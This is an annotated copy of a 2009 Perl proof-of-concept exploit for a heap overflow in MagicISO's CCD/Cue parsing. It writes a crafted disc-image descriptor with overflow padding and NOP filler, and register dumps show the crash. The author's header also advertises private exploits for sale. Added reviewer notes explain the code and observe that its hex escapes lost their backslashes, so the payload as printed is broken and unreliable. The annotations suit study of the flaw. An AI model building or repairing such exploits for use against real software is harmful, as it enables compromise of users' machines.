
magiciso-overflow.txt

Posted on 16 April 2009

#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash
#
# --- Reviewer notes on this copy -------------------------------------------
# What the script does: it takes one argument ('.ccd' or '.cue') and writes a
# single crafted disc-image descriptor, Exploit.ccd or Exploit.cue, into the
# current directory. Nothing is executed; the file is meant to be opened in
# MagicISO by hand to reproduce the crash recorded in the register dumps above.
#
# As pasted here the "\x" escapes appear to have lost their backslashes
# (e.g. "x5B" instead of "\x5B"). In Perl a double-quoted "x5B" is the three
# literal characters x, 5, B, so as written every string below is plain ASCII
# text, each "xNN" x COUNT filler is three characters per repetition, and the
# generated files do not have the layout the register dumps describe.
#
# The script runs without `use strict` / `use warnings`; both should be on.
# ----------------------------------------------------------------------------

# Print usage and exit. Ignores its arguments.
# NOTE(review): the usage text says ".cpp", but the dispatch at the bottom of
# the file accepts only ".ccd" or ".cue" -- most likely a typo in the message.
sub help {print "[!] usage : perl $0 .cpp perl $0 .cue " ;exit();}

# `&help` is the old-style call form (it forwards the current @_); `help()`
# is the preferred spelling. Harmless here because help() ignores @_.
&help unless $ARGV[0];

# Selector for which file format to emit; compared literally against '.ccd'
# and '.cue' below.
my $xpl = $ARGV[0];

# Minimal CloneCD (.ccd) descriptor. With the escapes restored it decodes to
# "[CloneCD]\r\nVersion=3\r\n[Disc]\r\nTocEntries=4\r\nSessions=1\r\n..." with
# four [Entry N] sections (Point=0xa0, 0xa1, 0xa2, 0x01) and ends with
# "[TRACK 1]\r\nMODE=1\r\nINDEX 1=999". There is no trailing line break, so in
# the .ccd branch $bypass is appended directly onto the INDEX 1 value.
my $header = "x5Bx43x6Cx6Fx6Ex65x43x44x5Dx0Dx0Ax56x65x72x73x69".
"x6Fx6Ex3Dx33x0Dx0Ax5Bx44x69x73x63x5Dx0Dx0Ax54x6F".
"x63x45x6Ex74x72x69x65x73x3Dx34x0Dx0Ax53x65x73x73".
"x69x6Fx6Ex73x3Dx31x0Dx0Ax44x61x74x61x54x72x61x63".
"x6Bx73x53x63x72x61x6Dx62x6Cx65x64x3Dx30x0Dx0Ax43".
"x44x54x65x78x74x4Cx65x6Ex67x74x68x3Dx30x0Dx0Ax5B".
"x53x65x73x73x69x6Fx6Ex20x31x5Dx0Dx0Ax50x72x65x47".
"x61x70x4Dx6Fx64x65x3Dx31x0Dx0Ax50x72x65x47x61x70".
"x53x75x62x43x3Dx30x0Dx0Ax5Bx45x6Ex74x72x79x20x30".
"x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6F".
"x69x6Ex74x3Dx30x78x61x30x0Dx0Ax41x44x52x3Dx30x78".
"x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34".
"x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69".
"x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72".
"x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30".
"x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx31".
"x0Dx0Ax50x53x65x63x3Dx30x0Dx0Ax50x46x72x61x6Dx65".
"x3Dx30x0Dx0Ax50x4Cx42x41x3Dx34x33x35x30x0Dx0Ax5B".
"x45x6Ex74x72x79x20x31x5Dx0Dx0Ax53x65x73x73x69x6F".
"x6Ex3Dx31x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x61x31x0D".
"x0Ax41x44x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72".
"x6Fx6Cx3Dx30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6F".
"x3Dx30x0Dx0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63".
"x3Dx30x0Dx0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4C".
"x42x41x3Dx2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0D".
"x0Ax50x4Dx69x6Ex3Dx31x0Dx0Ax50x53x65x63x3Dx30x0D".
"x0Ax50x46x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3D".
"x34x33x35x30x0Dx0Ax5Bx45x6Ex74x72x79x20x32x5Dx0D".
"x0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6Fx69x6E".
"x74x3Dx30x78x61x32x0Dx0Ax41x44x52x3Dx30x78x30x31".
"x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34x0Dx0A".
"x54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69x6Ex3D".
"x30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72x61x6D".
"x65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30x0Dx0A".
"x5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx30x0Dx0A".
"x50x53x65x63x3Dx32x0Dx0Ax50x46x72x61x6Dx65x3Dx33".
"x34x0Dx0Ax50x4Cx42x41x3Dx33x34x0Dx0Ax5Bx45x6Ex74".
"x72x79x20x33x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31".
"x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x30x31x0Dx0Ax41x44".
"x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3D".
"x30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0D".
"x0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0D".
"x0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3D".
"x2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4D".
"x69x6Ex3Dx30x0Dx0Ax50x53x65x63x3Dx32x0Dx0Ax50x46".
"x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3Dx30x0Dx0A".
"x5Bx54x52x41x43x4Bx20x31x5Dx0Dx0Ax4Dx4Fx44x45x3D".
"x31x0Dx0Ax49x4Ex44x45x58x20x31x3Dx39x39x39";

# Cue-sheet pieces. $header1 decodes to `FILE "` (the opening of a FILE line)
# and $header2 to `.BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00`.
# In the .cue branch the payload is placed between them, i.e. inside the quoted
# file name -- which matches the `FILE "999Ax%N...` string seen in EDX above.
my $header1= "x46x49x4cx45x20x22";
my $header2= "x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20".
"x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32".
"x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31".
"x20x30x30x3ax30x30x3ax30x30";

# Text the author labels "bypass": decodes to "999Ax" followed by a run of
# "%N" pairs (one "%%N" in the middle) and a hex-digit tail. Common to both
# output formats; it is the start of what the EDX dump shows.
my $bypass= "x39x39x39x41x78x25x4ex25x4ex25x4ex25x4ex25x4ex25".
"x4ex25x4ex25x4ex25x4ex25x4ex25x4ex25x25x4ex25x4e".
"x25x4ex25x4ex41x63x66x63x64x32x30x38x34x39x35x64".
"x35x36x35x65x66x36x36x65x37x64x66x66x39x66x39x38".
"x37x36x34x64x61x63x34x63x61x34x32x33x38x61x30";

# Four-byte markers ("CCCC", "DDDD", "EEEE") and fillers ("A" x 4004,
# "\x90" x 4, "\x91" x 20, "F" x 5000). The marker values are presumably chosen
# so each piece can be recognised in the register dumps above (EAX 44444141,
# ECX 45459090, EBX ..41) -- TODO confirm. As written (no backslashes) each
# repetition is the three characters "x41" etc., so the lengths are tripled.
my $edx = "x43x43x43x43";
my $Bof = "x41" x 4004;
my $eax = "x44x44x44x44";
my $Nop = "x90" x 4;
my $ecx = "x45x45x45x45";
my $Sop = "x91" x 20;
my $Hof = "x46" x 5000;

# Emit the chosen format. Layout:
#   .ccd : $header . $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof
#   .cue : $header1 . (same payload) . $header2
# NOTE(review): two-arg open on a bareword handle, with no check on open,
# print or close. If Exploit.ccd/Exploit.cue cannot be created the failure is
# silent and "[!] Done" is still printed. Idiomatic form:
#   open my $fh, '>', 'Exploit.ccd' or die "open Exploit.ccd: $!";
#   close $fh or die "close: $!";
# Any other argument falls through to help().
if ($xpl eq '.ccd') {open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done ";}
elsif ($xpl eq '.cue') {open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done "}
else {&help}

 
